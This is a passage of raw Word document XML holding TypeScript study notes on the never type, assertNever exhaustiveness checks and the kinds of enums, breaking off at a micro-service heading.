    <w:p w14:paraId="05BEF094"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side: number;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09201DFC"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02AF336"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AC12DF7"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calculateArea(shape: Shape): number {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="600D4448"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switch (shape.kind) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78015931"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case "circle":</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66C7A13D"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Math.PI * shape.radius ** 2;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1381857E"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case "square":</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AEAEE90"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shape.side ** 2;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51CF0891"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default:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E887F11"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This ensures that all possible cases of Shape are handled</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="257F613B"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If new shapes are added to the Shape type, TypeScript will produce an error here</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22C1D4CD"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assertNever(shape);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="010D7114"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BB7AD02"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0750E07"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5A801ED"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assertNever(value: never): never {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="095EC3B5"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throw new Error(`Unexpected value: ${value}`);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1386ABBB"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076E885" w14:textId="77777777" w:rsidR="00ED56BE" w:rsidRPr="00DA2F32" w:rsidRDefault="00ED56BE" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>In the calculateArea function:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CC30A03" w14:textId="77777777" w:rsidR="00ED56BE" w:rsidRPr="00DA2F32" w:rsidRDefault="00ED56BE" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="299"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>The default case in the switch statement handles any unexpected values.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4163EACF" w14:textId="77777777" w:rsidR="00ED56BE" w:rsidRPr="00DA2F32" w:rsidRDefault="00ED56BE" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="299"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>assertNever function ensures that shape is of type never if it is not one of the expected cases, which helps catch any missing cases or errors.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3133D93F" w14:textId="77777777" w:rsidR="00ED56BE" w:rsidRPr="00DA2F32" w:rsidRDefault="00ED56BE" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="300"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Type Assertion</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D221BC2" w14:textId="77777777" w:rsidR="00ED56BE" w:rsidRPr="00DA2F32" w:rsidRDefault="00ED56BE" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>The never type can also be used in type assertions to ensure that a variable should never be of a certain type.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18E77512"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handleUnknown(value: unknown) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0282F209"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(typeof value === "string") {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="748BE31C"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Handle string case</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3594B0F2"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if (typeof value === "number") {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24550391"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Handle number case</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C76885F"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1A5A9548"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Assert that all other cases are impossible</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="201DACDF"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assertNever(value);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D7DA5F4"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8544B4C" w14:textId="77777777" w:rsidR="00ED56BE" w:rsidRPr="00DA2F32" w:rsidRDefault="00ED56B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4D96B4A" w14:textId="77777777" w:rsidR="00ED56BE" w:rsidRPr="00DA2F32" w:rsidRDefault="00ED56BE" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>In this example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03F5D712" w14:textId="77777777" w:rsidR="00ED56BE" w:rsidRPr="00DA2F32" w:rsidRDefault="00ED56BE" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="301"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>assertNever helps to ensure that value should not be of any other type.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02111154" w14:textId="77777777" w:rsidR="0002063F" w:rsidRPr="00DA2F32" w:rsidRDefault="0002063F" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="49D45D36" w14:textId="63D280CE" w:rsidR="00BB2F17" w:rsidRPr="00DA2F32" w:rsidRDefault="009A2163" w:rsidP="009E0607">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="108" w:name="_Toc178383291"/>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>How do you handle enums in TypeScript</w:t>
      </w:r>
      <w:bookmarkEnd w:id="108"/>
    </w:p>
    <w:p w14:paraId="615E0EF2"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Enums in TypeScript are a feature that allows you to define a set of named constants, which can be used to represent a collection of related values. They provide a way to give more meaningful names to sets of numeric or string values. Enums are useful for managing a fixed set of values in a readable and maintainable way.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="707040B7"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Here’s a detailed guide on how to handle enums in TypeScript:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D6F8E6A" w14:textId="77777777" w:rsidR="00831BE8" w:rsidRPr="00DA2F32" w:rsidRDefault="00831BE8" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>1. Basic Enums</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BB73B91"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TypeScript supports both numeric and string enums.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F751952"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b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Numeric Enums:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A592AFD"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By default, enums are numeric, where the first value is assigned 0 and subsequent values are incremented by 1.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F3E13D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enum Direction {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B8C7720"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Up,    // 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46C2D3CD"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Down,  // 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B443CC2"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Left,  // 2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43DBBDC9"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Right  // 3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="600CA3A8"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FEF437D"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8FCFBF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move: Direction = Direction.Up;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C5BC9C4"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console.log(move); // Output: 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0858282B"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You can also manually set the value for an enum member:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54648E9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enum Direction {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30BFBAEF"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Up = 1,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46732882"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Down = 2,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AE5DA38"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Left = 4,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EF16BC2"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Right = 8</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EBFF460"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50EED4D"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8B2886E"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move: Direction = Direction.Left;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44289530"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console.log(move); // Output: 4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63F0393D"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b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>String Enums:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11D0BB18"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String enums are where each member of the enum is assigned a string value.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FA64AB5"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4F964D8C"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enum Direction {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5429E5E6"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Up = "UP",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="666593ED"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Down = "DOWN",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61E8D019"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Left = "LEFT",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B844997"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Right = "RIGHT"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D07FF0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6CF4281"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837009E"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move: Direction = Direction.Up;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="611F7840"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console.log(move); // Output: "UP"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F551AB3" w14:textId="77777777" w:rsidR="00831BE8" w:rsidRPr="00DA2F32" w:rsidRDefault="00831BE8" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>2. Computed and Constant Members</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EEE0AA3"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Enum members can be constant or computed. Constant members are those that are evaluated at compile-time, while computed members are evaluated at runtime.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D1ADF3E"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7C43AE4F"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enum FileAccess {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B82FFCA"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None,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B9BC238"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Read = 1 &lt;&lt; 0,  // 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2176D662"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Write = 1 &lt;&lt; 1, // 2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="670B20C7"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ReadWrite = Read | Write // 3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30F54E7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DCFA204"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187402E"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console.log(FileAccess.Read); // Output: 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CB5FE8D"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console.log(FileAccess.ReadWrite); // Output: 3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CF338E5" w14:textId="77777777" w:rsidR="00831BE8" w:rsidRPr="00DA2F32" w:rsidRDefault="00831BE8" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>3. Heterogeneous Enums</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79DA8294"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Enums can mix numeric and string values, though this is less common and can be confusing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03AC740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enum Result {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09EB91FA"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Success = "SUCCESS",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D4BD31A"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Failure = 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50EE5786"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2A089A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3CE44B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result: Result = Result.Success;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B2F8B14"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console.log(result); // Output: "SUCCESS"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49F7739A" w14:textId="77777777" w:rsidR="00831BE8" w:rsidRPr="00DA2F32" w:rsidRDefault="00831BE8" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>4. Enum Members and Reverse Mapping</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="351AC605"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Numeric enums have a reverse mapping feature, where you can access the name of an enum member from its value.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="040044A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enum Direction {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19570B92"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Up = 1,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B63A366"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Down,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78806534"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Left,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70B7845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Right</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B5CA83D"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CAF13A3"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3912823"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console.log(Direction[1]); // Output: "Up"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12BD8AFA"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console.log(Direction[2]); // Output: "Down"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C895E82"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This feature does not apply to string enums.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CFB51DC" w14:textId="77777777" w:rsidR="00831BE8" w:rsidRPr="00DA2F32" w:rsidRDefault="00831BE8" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>5. Using Enums in TypeScript</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="208013FB"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Enums are commonly used in switch statements, for comparisons, and as function parameters or return types.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B6D60F0"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enum Status {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E2CDBBD"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Pending = "PENDING",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09F6A194"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InProgress = "IN_PROGRESS",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55A15BE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Completed = "COMPLETED"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A50263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FD67EF1"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2D0CC87"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updateStatus(status: Status) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F431CE0"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switch (status) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CB7A24E"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case Status.Pending:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BDA5784"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console.log("Status is pending");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="225C19E1"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break;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="425985AF"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case Status.InProgress:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F6A663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console.log("Status is in progress");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FE00514"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break;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="402F93A0"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case Status.Completed:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C3F4646"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console.log("Status is completed");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2277F3E0"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break;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ED3A95F"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91588EA"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A3245F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5B2B6BF"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updateStatus(Status.InProgress); // Output: "Status is in progress"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4419A90F" w14:textId="77777777" w:rsidR="00831BE8" w:rsidRPr="00DA2F32" w:rsidRDefault="00831BE8" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>6. Const Enums</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27777EF7"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Const enums are a way to optimize enum usage by inlining the values during compilation, thus reducing the generated JavaScript code. Const enums can only use constant members and are not accessible at runtime.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0699C170"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enum Direction {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="539E91A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Up,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05473EDE"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Down,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="194373C9"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Left,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BBDB52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Right</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47DB1F16"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C44763E"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9790DE7"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move = Direction.Up;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2417278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console.log(move); // Output: 0 (inlined during compilation)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2754C40F"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b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Note:</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> You should use const enums only if you need to optimize for performance and you don’t need to access the enum at runtime.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79F22EA4" w14:textId="77777777" w:rsidR="00831BE8" w:rsidRPr="00DA2F32" w:rsidRDefault="00831BE8" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>7. Ambient Enums</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AF43673" w14:textId="77777777" w:rsidR="00831BE8" w:rsidRPr="00DA2F32" w:rsidRDefault="00831BE8" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Ambient enums are used to describe the shape of enums defined outside of TypeScript, typically in a library or JavaScript code. They are declared using the declare keyword.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DA7460E"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declare enum Directions {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75376C89"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Up,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A4BC1B9"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Down,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7753BD1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Left,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6289B787"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Right</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58529B45"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41B8F1D"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04E3EB3"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Usage</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34C839E9"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let move: Directions = Directions.Up;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0062742B" w14:textId="77777777" w:rsidR="00831BE8" w:rsidRPr="00DA2F32" w:rsidRDefault="00831BE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console.log(move); // Output depends on the ambient enum declaration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4377C6FC" w14:textId="77777777" w:rsidR="0002063F" w:rsidRPr="00DA2F32" w:rsidRDefault="0002063F" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2F7E9C58" w14:textId="77777777" w:rsidR="00BB2F17" w:rsidRPr="00DA2F32" w:rsidRDefault="00BB2F17" w:rsidP="009E0607">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="7532FE68" w14:textId="77777777" w:rsidR="00BB2F17" w:rsidRPr="00DA2F32" w:rsidRDefault="009A2163" w:rsidP="009E0607">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="109" w:name="_Toc178383292"/>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Micro-Service</w:t>
      </w:r>
      <w:bookmarkEnd w:id="109"/>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A7E03DB" w14:textId="77777777" w:rsidR="00D246F0" w:rsidRPr="00DA2F32" w:rsidRDefault="009A2163" w:rsidP="009E0607">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="110" w:name="_Toc178383293"/>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
